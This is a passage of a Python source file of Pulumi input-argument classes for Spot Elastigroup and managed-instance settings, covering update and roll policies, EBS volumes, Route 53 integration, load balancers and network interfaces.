        :param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
        """
        # Both fields are required, so they are stored unconditionally.
        for attr_name, attr_value in (("stateful_instance_id", stateful_instance_id),
                                      ("type", type)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="statefulInstanceId")
    def stateful_instance_id(self) -> pulumi.Input[str]:
        """
        The ID of the stateful instance the action targets.
        """
        return pulumi.get(self, "stateful_instance_id")

    @stateful_instance_id.setter
    def stateful_instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "stateful_instance_id", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ElastigroupTagArgs:
    def __init__(__self__, *,
                 key: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        A single key/value tag entry.

        :param pulumi.Input[str] key: NOTE(review): undocumented in the generated
            upstream docs — presumably the tag's key; confirm against the provider schema.
        :param pulumi.Input[str] value: The dimension value.
            NOTE(review): "dimension value" looks copy-pasted from a scaling-policy
            dimension; for a tag this is presumably the tag's value — confirm.
        """
        if key is not None:
            pulumi.set(__self__, "key", key)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        # No upstream docstring was generated for this field; see __init__ notes.
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The dimension value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupUpdatePolicyArgs:
    def __init__(__self__, *,
                 should_resume_stateful: pulumi.Input[bool],
                 should_roll: pulumi.Input[bool],
                 auto_apply_tags: Optional[pulumi.Input[bool]] = None,
                 roll_config: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']] = None):
        """
        Policy controlling how configuration updates are applied to the group.

        :param pulumi.Input[bool] should_resume_stateful: This will apply resuming action for Stateful instances in the Elastigroup upon scale up or capacity changes. Example usage will be for Elastigroups that will have scheduling rules to set a target capacity of 0 instances in the night and automatically restore the same state of the instances in the morning.
        :param pulumi.Input[bool] should_roll: Sets the enablement of the roll option.
        :param pulumi.Input[bool] auto_apply_tags: Enables updates to tags without rolling the group when set to `true`.
        :param pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs'] roll_config: While used, you can control whether the group should perform a deployment after an update to the configuration.
        """
        # Required settings first, then optional ones only when provided.
        pulumi.set(__self__, "should_resume_stateful", should_resume_stateful)
        pulumi.set(__self__, "should_roll", should_roll)
        for opt_name, opt_value in (("auto_apply_tags", auto_apply_tags),
                                    ("roll_config", roll_config)):
            if opt_value is not None:
                pulumi.set(__self__, opt_name, opt_value)

    @property
    @pulumi.getter(name="shouldResumeStateful")
    def should_resume_stateful(self) -> pulumi.Input[bool]:
        """
        Applies a resume action to stateful instances in the Elastigroup upon scale-up
        or capacity changes (e.g. groups scheduled to capacity 0 at night that restore
        the same instance state in the morning).
        """
        return pulumi.get(self, "should_resume_stateful")

    @should_resume_stateful.setter
    def should_resume_stateful(self, value: pulumi.Input[bool]):
        pulumi.set(self, "should_resume_stateful", value)

    @property
    @pulumi.getter(name="shouldRoll")
    def should_roll(self) -> pulumi.Input[bool]:
        """
        Enables or disables the roll option.
        """
        return pulumi.get(self, "should_roll")

    @should_roll.setter
    def should_roll(self, value: pulumi.Input[bool]):
        pulumi.set(self, "should_roll", value)

    @property
    @pulumi.getter(name="autoApplyTags")
    def auto_apply_tags(self) -> Optional[pulumi.Input[bool]]:
        """
        When `true`, tag updates are applied without rolling the group.
        """
        return pulumi.get(self, "auto_apply_tags")

    @auto_apply_tags.setter
    def auto_apply_tags(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_apply_tags", value)

    @property
    @pulumi.getter(name="rollConfig")
    def roll_config(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']]:
        """
        Controls whether the group performs a deployment after a configuration update.
        """
        return pulumi.get(self, "roll_config")

    @roll_config.setter
    def roll_config(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']]):
        pulumi.set(self, "roll_config", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigArgs:
    def __init__(__self__, *,
                 batch_size_percentage: pulumi.Input[int],
                 grace_period: Optional[pulumi.Input[int]] = None,
                 health_check_type: Optional[pulumi.Input[str]] = None,
                 strategy: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']] = None,
                 wait_for_roll_percentage: Optional[pulumi.Input[float]] = None,
                 wait_for_roll_timeout: Optional[pulumi.Input[int]] = None):
        """
        Deployment-roll configuration used by the group's update policy.

        :param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
        :param pulumi.Input[int] grace_period: Sets the grace period for new instances to become healthy.
        :param pulumi.Input[str] health_check_type: Sets the health check type to use. Valid values: `"EC2"`, `"ECS_CLUSTER_INSTANCE"`, `"ELB"`, `"HCS"`, `"MLB"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`, `"NONE"`.
        :param pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs'] strategy: Strategy parameters
        :param pulumi.Input[float] wait_for_roll_percentage: For use with `should_roll`. Sets minimum % of roll required to complete before continuing the plan. Required if `wait_for_roll_timeout` is set.
        :param pulumi.Input[int] wait_for_roll_timeout: For use with `should_roll`. Sets how long to wait for the deployed % of a roll to exceed `wait_for_roll_percentage` before continuing the plan. Required if `wait_for_roll_percentage` is set.
        """
        # Batch size is mandatory; remaining options are stored only when supplied.
        pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
        optional_args = {
            "grace_period": grace_period,
            "health_check_type": health_check_type,
            "strategy": strategy,
            "wait_for_roll_percentage": wait_for_roll_percentage,
            "wait_for_roll_timeout": wait_for_roll_timeout,
        }
        for attr_name, attr_value in optional_args.items():
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> pulumi.Input[int]:
        """
        Percentage of the instances to deploy in each batch.
        """
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: pulumi.Input[int]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="gracePeriod")
    def grace_period(self) -> Optional[pulumi.Input[int]]:
        """
        Grace period for new instances to become healthy.
        """
        return pulumi.get(self, "grace_period")

    @grace_period.setter
    def grace_period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "grace_period", value)

    @property
    @pulumi.getter(name="healthCheckType")
    def health_check_type(self) -> Optional[pulumi.Input[str]]:
        """
        Health check type to use. Valid values: `"EC2"`, `"ECS_CLUSTER_INSTANCE"`, `"ELB"`, `"HCS"`, `"MLB"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`, `"NONE"`.
        """
        return pulumi.get(self, "health_check_type")

    @health_check_type.setter
    def health_check_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_type", value)

    @property
    @pulumi.getter
    def strategy(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']]:
        """
        Strategy parameters for the roll.
        """
        return pulumi.get(self, "strategy")

    @strategy.setter
    def strategy(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']]):
        pulumi.set(self, "strategy", value)

    @property
    @pulumi.getter(name="waitForRollPercentage")
    def wait_for_roll_percentage(self) -> Optional[pulumi.Input[float]]:
        """
        For use with `should_roll`. Minimum % of the roll that must complete before the
        plan continues. Required if `wait_for_roll_timeout` is set.
        """
        return pulumi.get(self, "wait_for_roll_percentage")

    @wait_for_roll_percentage.setter
    def wait_for_roll_percentage(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "wait_for_roll_percentage", value)

    @property
    @pulumi.getter(name="waitForRollTimeout")
    def wait_for_roll_timeout(self) -> Optional[pulumi.Input[int]]:
        """
        For use with `should_roll`. How long to wait for the deployed % of a roll to
        exceed `wait_for_roll_percentage` before the plan continues. Required if
        `wait_for_roll_percentage` is set.
        """
        return pulumi.get(self, "wait_for_roll_timeout")

    @wait_for_roll_timeout.setter
    def wait_for_roll_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "wait_for_roll_timeout", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigStrategyArgs:
    def __init__(__self__, *,
                 action: pulumi.Input[str],
                 batch_min_healthy_percentage: Optional[pulumi.Input[int]] = None,
                 on_failure: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']] = None,
                 should_drain_instances: Optional[pulumi.Input[bool]] = None):
        """
        Strategy settings for a deployment roll.

        :param pulumi.Input[str] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
        :param pulumi.Input[int] batch_min_healthy_percentage: Indicates the threshold of minimum healthy instances in single batch. If the amount of healthy instances in single batch is under the threshold, the deployment will fail. Range `1` - `100`.
        :param pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs'] on_failure: Set detach options to the deployment.
        :param pulumi.Input[bool] should_drain_instances: Specify whether to drain incoming TCP connections before terminating a server.
        """
        # The action is mandatory; the rest are forwarded only when provided.
        pulumi.set(__self__, "action", action)
        for opt_name, opt_value in (("batch_min_healthy_percentage", batch_min_healthy_percentage),
                                    ("on_failure", on_failure),
                                    ("should_drain_instances", should_drain_instances)):
            if opt_value is not None:
                pulumi.set(__self__, opt_name, opt_value)

    @property
    @pulumi.getter
    def action(self) -> pulumi.Input[str]:
        """
        Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
        """
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input[str]):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter(name="batchMinHealthyPercentage")
    def batch_min_healthy_percentage(self) -> Optional[pulumi.Input[int]]:
        """
        Threshold of minimum healthy instances per batch; a batch below the threshold
        fails the deployment. Range `1` - `100`.
        """
        return pulumi.get(self, "batch_min_healthy_percentage")

    @batch_min_healthy_percentage.setter
    def batch_min_healthy_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_min_healthy_percentage", value)

    @property
    @pulumi.getter(name="onFailure")
    def on_failure(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']]:
        """
        Detach options applied to the deployment on failure.
        """
        return pulumi.get(self, "on_failure")

    @on_failure.setter
    def on_failure(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']]):
        pulumi.set(self, "on_failure", value)

    @property
    @pulumi.getter(name="shouldDrainInstances")
    def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to drain incoming TCP connections before terminating a server.
        """
        return pulumi.get(self, "should_drain_instances")

    @should_drain_instances.setter
    def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs:
    def __init__(__self__, *,
                 action_type: pulumi.Input[str],
                 batch_num: Optional[pulumi.Input[int]] = None,
                 draining_timeout: Optional[pulumi.Input[int]] = None,
                 should_decrement_target_capacity: Optional[pulumi.Input[bool]] = None,
                 should_handle_all_batches: Optional[pulumi.Input[bool]] = None):
        """
        Failure-handling (detach) options for a deployment roll.

        :param pulumi.Input[str] action_type: Sets the action that will take place, Accepted values are: `DETACH_OLD`, `DETACH_NEW`.
        :param pulumi.Input[int] batch_num: NOTE(review): undocumented in the generated
            upstream docs — presumably a batch count/identifier; confirm against the
            Spot API schema before relying on it.
        :param pulumi.Input[int] draining_timeout: Indicates (in seconds) the timeout to wait until instance are detached.
        :param pulumi.Input[bool] should_decrement_target_capacity: Decrementing the group target capacity after detaching the instances.
        :param pulumi.Input[bool] should_handle_all_batches: Indicator if the action should apply to all batches of the deployment or only the latest batch.
        """
        pulumi.set(__self__, "action_type", action_type)
        if batch_num is not None:
            pulumi.set(__self__, "batch_num", batch_num)
        if draining_timeout is not None:
            pulumi.set(__self__, "draining_timeout", draining_timeout)
        if should_decrement_target_capacity is not None:
            pulumi.set(__self__, "should_decrement_target_capacity", should_decrement_target_capacity)
        if should_handle_all_batches is not None:
            pulumi.set(__self__, "should_handle_all_batches", should_handle_all_batches)

    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> pulumi.Input[str]:
        """
        Sets the action that will take place, Accepted values are: `DETACH_OLD`, `DETACH_NEW`.
        """
        return pulumi.get(self, "action_type")

    @action_type.setter
    def action_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "action_type", value)

    @property
    @pulumi.getter(name="batchNum")
    def batch_num(self) -> Optional[pulumi.Input[int]]:
        # No upstream docstring was generated for this field; see __init__ notes.
        return pulumi.get(self, "batch_num")

    @batch_num.setter
    def batch_num(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_num", value)

    @property
    @pulumi.getter(name="drainingTimeout")
    def draining_timeout(self) -> Optional[pulumi.Input[int]]:
        """
        Indicates (in seconds) the timeout to wait until instances are detached.
        """
        return pulumi.get(self, "draining_timeout")

    @draining_timeout.setter
    def draining_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "draining_timeout", value)

    @property
    @pulumi.getter(name="shouldDecrementTargetCapacity")
    def should_decrement_target_capacity(self) -> Optional[pulumi.Input[bool]]:
        """
        Decrement the group target capacity after detaching the instances.
        """
        return pulumi.get(self, "should_decrement_target_capacity")

    @should_decrement_target_capacity.setter
    def should_decrement_target_capacity(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_decrement_target_capacity", value)

    @property
    @pulumi.getter(name="shouldHandleAllBatches")
    def should_handle_all_batches(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the action applies to all batches of the deployment or only the latest batch.
        """
        return pulumi.get(self, "should_handle_all_batches")

    @should_handle_all_batches.setter
    def should_handle_all_batches(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_handle_all_batches", value)
@pulumi.input_type
class ManagedInstanceBlockDeviceMappingArgs:
    def __init__(__self__, *,
                 device_name: pulumi.Input[str],
                 ebs: Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']] = None):
        """
        A block-device mapping for a managed instance.

        :param pulumi.Input[str] device_name: The name of the device to mount.
        :param pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs'] ebs: Object
        """
        pulumi.set(__self__, "device_name", device_name)
        # The EBS sub-object is optional; omit it entirely when not supplied.
        if ebs is not None:
            pulumi.set(__self__, "ebs", ebs)

    @property
    @pulumi.getter(name="deviceName")
    def device_name(self) -> pulumi.Input[str]:
        """
        Name of the device to mount.
        """
        return pulumi.get(self, "device_name")

    @device_name.setter
    def device_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "device_name", value)

    @property
    @pulumi.getter
    def ebs(self) -> Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']]:
        """
        EBS volume settings for this device mapping.
        """
        return pulumi.get(self, "ebs")

    @ebs.setter
    def ebs(self, value: Optional[pulumi.Input['ManagedInstanceBlockDeviceMappingEbsArgs']]):
        pulumi.set(self, "ebs", value)
@pulumi.input_type
class ManagedInstanceBlockDeviceMappingEbsArgs:
    def __init__(__self__, *,
                 delete_on_termination: Optional[pulumi.Input[bool]] = None,
                 iops: Optional[pulumi.Input[int]] = None,
                 throughput: Optional[pulumi.Input[int]] = None,
                 volume_size: Optional[pulumi.Input[int]] = None,
                 volume_type: Optional[pulumi.Input[str]] = None):
        """
        EBS volume settings for a block-device mapping.

        :param pulumi.Input[bool] delete_on_termination: Whether the volume should be destroyed on instance termination.
        :param pulumi.Input[int] iops: The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
        :param pulumi.Input[int] throughput: The throughput that the volume supports, in MiB/s. Minimum value of 125. Maximum value of 1000. Valid only if `volume_type` is set to `"gp3"`.
        :param pulumi.Input[int] volume_size: The size of the volume, in GiBs.
        :param pulumi.Input[str] volume_type: The type of volume. Can be `"standard"`, `"gp2"`, `"gp3"`, `"io1"`, `"st1"` or `"sc1"`.
        """
        # Every field is optional; record only what the caller supplied.
        supplied = {
            "delete_on_termination": delete_on_termination,
            "iops": iops,
            "throughput": throughput,
            "volume_size": volume_size,
            "volume_type": volume_type,
        }
        for attr_name, attr_value in supplied.items():
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="deleteOnTermination")
    def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the volume is destroyed on instance termination.
        """
        return pulumi.get(self, "delete_on_termination")

    @delete_on_termination.setter
    def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_on_termination", value)

    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """
        Amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html).
        Must be set with a `volume_type` of `"io1"`.
        """
        return pulumi.get(self, "iops")

    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)

    @property
    @pulumi.getter
    def throughput(self) -> Optional[pulumi.Input[int]]:
        """
        Throughput the volume supports, in MiB/s (125-1000). Valid only if
        `volume_type` is set to `"gp3"`.
        """
        return pulumi.get(self, "throughput")

    @throughput.setter
    def throughput(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "throughput", value)

    @property
    @pulumi.getter(name="volumeSize")
    def volume_size(self) -> Optional[pulumi.Input[int]]:
        """
        Size of the volume, in GiBs.
        """
        return pulumi.get(self, "volume_size")

    @volume_size.setter
    def volume_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volume_size", value)

    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> Optional[pulumi.Input[str]]:
        """
        Volume type: `"standard"`, `"gp2"`, `"gp3"`, `"io1"`, `"st1"` or `"sc1"`.
        """
        return pulumi.get(self, "volume_type")

    @volume_type.setter
    def volume_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "volume_type", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53Args:
    """Route 53 integration settings for a managed instance."""

    def __init__(__self__, *,
                 domains: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]):
        """
        :param pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]] domains: Route 53 Domain configurations.
        """
        # `domains` is the sole, required field of this integration block.
        pulumi.set(__self__, "domains", domains)

    @property
    @pulumi.getter
    def domains(self) -> pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]:
        """Route 53 Domain configurations."""
        return pulumi.get(self, "domains")

    @domains.setter
    def domains(self, value: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainArgs']]]):
        pulumi.set(self, "domains", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53DomainArgs:
    """Configuration of one Route 53 domain used by the integration."""

    def __init__(__self__, *,
                 hosted_zone_id: pulumi.Input[str],
                 record_sets: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]],
                 record_set_type: Optional[pulumi.Input[str]] = None,
                 spotinst_acct_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] hosted_zone_id: The Route 53 Hosted Zone Id for the registered Domain.
        :param pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]] record_sets: List of record sets
        :param pulumi.Input[str] record_set_type: The type of the record set. Valid values: `"a"`, `"cname"`.
        :param pulumi.Input[str] spotinst_acct_id: The Spotinst account ID that is linked to the AWS account that holds the Route 53 hosted Zone Id. The default is the user Spotinst account provided as a URL parameter.
        """
        # Required fields are stored unconditionally.
        pulumi.set(__self__, "hosted_zone_id", hosted_zone_id)
        pulumi.set(__self__, "record_sets", record_sets)
        # Optional fields are persisted only when explicitly supplied.
        for attr_name, attr_value in (("record_set_type", record_set_type),
                                      ("spotinst_acct_id", spotinst_acct_id)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="hostedZoneId")
    def hosted_zone_id(self) -> pulumi.Input[str]:
        """The Route 53 Hosted Zone Id for the registered Domain."""
        return pulumi.get(self, "hosted_zone_id")

    @hosted_zone_id.setter
    def hosted_zone_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "hosted_zone_id", value)

    @property
    @pulumi.getter(name="recordSets")
    def record_sets(self) -> pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]]:
        """List of record sets"""
        return pulumi.get(self, "record_sets")

    @record_sets.setter
    def record_sets(self, value: pulumi.Input[Sequence[pulumi.Input['ManagedInstanceIntegrationRoute53DomainRecordSetArgs']]]):
        pulumi.set(self, "record_sets", value)

    @property
    @pulumi.getter(name="recordSetType")
    def record_set_type(self) -> Optional[pulumi.Input[str]]:
        """The type of the record set. Valid values: `"a"`, `"cname"`."""
        return pulumi.get(self, "record_set_type")

    @record_set_type.setter
    def record_set_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "record_set_type", value)

    @property
    @pulumi.getter(name="spotinstAcctId")
    def spotinst_acct_id(self) -> Optional[pulumi.Input[str]]:
        """The Spotinst account ID that is linked to the AWS account that holds the Route 53 hosted Zone Id. The default is the user Spotinst account provided as a URL parameter."""
        return pulumi.get(self, "spotinst_acct_id")

    @spotinst_acct_id.setter
    def spotinst_acct_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "spotinst_acct_id", value)
@pulumi.input_type
class ManagedInstanceIntegrationRoute53DomainRecordSetArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 use_public_dns: Optional[pulumi.Input[bool]] = None,
                 use_public_ip: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] name: The record set name.
        :param pulumi.Input[bool] use_public_dns: Designates whether the DNS address should be exposed to connections outside the VPC.
        :param pulumi.Input[bool] use_public_ip: Designates whether the IP address should be exposed to connections outside the VPC.
        """
        pulumi.set(__self__, "name", name)
        if use_public_dns is not None:
            pulumi.set(__self__, "use_public_dns", use_public_dns)
        if use_public_ip is not None:
            pulumi.set(__self__, "use_public_ip", use_public_ip)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The record set name.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="usePublicDns")
    def use_public_dns(self) -> Optional[pulumi.Input[bool]]:
        """
        Designates whether the DNS address should be exposed to connections outside the VPC.
        """
        return pulumi.get(self, "use_public_dns")
    @use_public_dns.setter
    def use_public_dns(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_public_dns", value)
    @property
    @pulumi.getter(name="usePublicIp")
    def use_public_ip(self) -> Optional[pulumi.Input[bool]]:
        """
        Designates whether the IP address should be exposed to connections outside the VPC.
        """
        return pulumi.get(self, "use_public_ip")
    @use_public_ip.setter
    def use_public_ip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_public_ip", value)
@pulumi.input_type
class ManagedInstanceLoadBalancerArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 arn: Optional[pulumi.Input[str]] = None,
                 auto_weight: Optional[pulumi.Input[bool]] = None,
                 az_awareness: Optional[pulumi.Input[bool]] = None,
                 balancer_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 target_set_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: The load balancer type. Valid values: `"CLASSIC"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`.
        :param pulumi.Input[str] arn: The AWS resource ARN (Required only for ALB target groups).
        :param pulumi.Input[bool] auto_weight: "Auto Weight" will automatically provide a higher weight for instances that are larger as appropriate. For example, if you have configured your Elastigroup with m4.large and m4.xlarge instances the m4.large will have half the weight of an m4.xlarge. This ensures that larger instances receive a higher number of MLB requests.
        :param pulumi.Input[bool] az_awareness: "AZ Awareness" will ensure that instances within the same AZ are using the corresponding MLB runtime instance in the same AZ. This feature reduces multi-zone data transfer fees.
        :param pulumi.Input[str] balancer_id: The Multai load balancer ID. Example: lb-123456
        :param pulumi.Input[str] name: The name of the load balancer.
        :param pulumi.Input[str] target_set_id: The Multai load target set ID. Example: ts-123456
        """
        pulumi.set(__self__, "type", type)
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if auto_weight is not None:
            pulumi.set(__self__, "auto_weight", auto_weight)
        if az_awareness is not None:
            pulumi.set(__self__, "az_awareness", az_awareness)
        if balancer_id is not None:
            pulumi.set(__self__, "balancer_id", balancer_id)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if target_set_id is not None:
            pulumi.set(__self__, "target_set_id", target_set_id)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The load balancer type. Valid values: `"CLASSIC"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        The AWS resource ARN (Required only for ALB target groups).
        """
        return pulumi.get(self, "arn")
    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)
    @property
    @pulumi.getter(name="autoWeight")
    def auto_weight(self) -> Optional[pulumi.Input[bool]]:
        """
        "Auto Weight" will automatically provide a higher weight for instances that are larger as appropriate. For example, if you have configured your Elastigroup with m4.large and m4.xlarge instances the m4.large will have half the weight of an m4.xlarge. This ensures that larger instances receive a higher number of MLB requests.
        """
        return pulumi.get(self, "auto_weight")
    @auto_weight.setter
    def auto_weight(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_weight", value)
    @property
    @pulumi.getter(name="azAwareness")
    def az_awareness(self) -> Optional[pulumi.Input[bool]]:
        """
        "AZ Awareness" will ensure that instances within the same AZ are using the corresponding MLB runtime instance in the same AZ. This feature reduces multi-zone data transfer fees.
        """
        return pulumi.get(self, "az_awareness")
    @az_awareness.setter
    def az_awareness(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "az_awareness", value)
    @property
    @pulumi.getter(name="balancerId")
    def balancer_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Multai load balancer ID. Example: lb-123456
        """
        return pulumi.get(self, "balancer_id")
    @balancer_id.setter
    def balancer_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "balancer_id", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the load balancer.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="targetSetId")
    def target_set_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Multai load target set ID. Example: ts-123456
        """
        return pulumi.get(self, "target_set_id")
    @target_set_id.setter
    def target_set_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_set_id", value)
@pulumi.input_type
class ManagedInstanceManagedInstanceActionArgs:
    """An action to apply to the managed instance."""

    def __init__(__self__, *,
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`.
        """
        # `type` is the only (required) field of this action block.
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """String, Action type. Supported action types: `pause`, `resume`, `recycle`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedInstanceNetworkInterfaceArgs:
    """Network interface attachment settings for a managed instance."""

    def __init__(__self__, *,
                 device_index: pulumi.Input[str],
                 associate_ipv6_address: Optional[pulumi.Input[bool]] = None,
                 associate_public_ip_address: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] device_index: The position of the network interface in the attachment order. A primary network interface has a device index of 0. If you specify a network interface when launching an instance, you must specify the device index.
        :param pulumi.Input[bool] associate_ipv6_address: Indicates whether to assign an IPv6 address. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. Default: `false`
        :param pulumi.Input[bool] associate_public_ip_address: Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is true.
        """
        # The device index is required; the two association flags are
        # persisted only when the caller set them explicitly.
        pulumi.set(__self__, "device_index", device_index)
        for attr_name, attr_value in (
                ("associate_ipv6_address", associate_ipv6_address),
                ("associate_public_ip_address", associate_public_ip_address)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
